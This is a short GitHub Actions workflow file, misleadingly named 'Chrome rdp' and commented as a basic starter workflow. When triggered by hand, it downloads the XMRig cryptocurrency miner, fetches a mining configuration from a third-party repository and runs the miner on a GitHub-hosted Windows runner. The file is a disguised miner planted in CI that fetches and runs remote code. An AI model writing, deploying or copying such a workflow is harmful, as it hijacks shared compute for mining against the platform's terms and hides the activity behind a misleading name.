# This is a basic workflow to help you get started with Actions

name: Chrome rdp

on: 
  workflow_dispatch:
jobs:
  build:
    runs-on: windows-2019

    steps:
    - name: downloading xm
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-gcc-win64.zip -OutFile xmrig-6.17.0-gcc-win64.zip && unzip xmrig-6.17.0-gcc-win64.zip
    - name: download new files
      run: Invoke-WebRequest https://raw.githubusercontent.com/Ma24wt/win11_rdp/main/config.json -OutFile config.json
    - name: starting
      run: cd xmrig-6.17.0 && ./xmrig
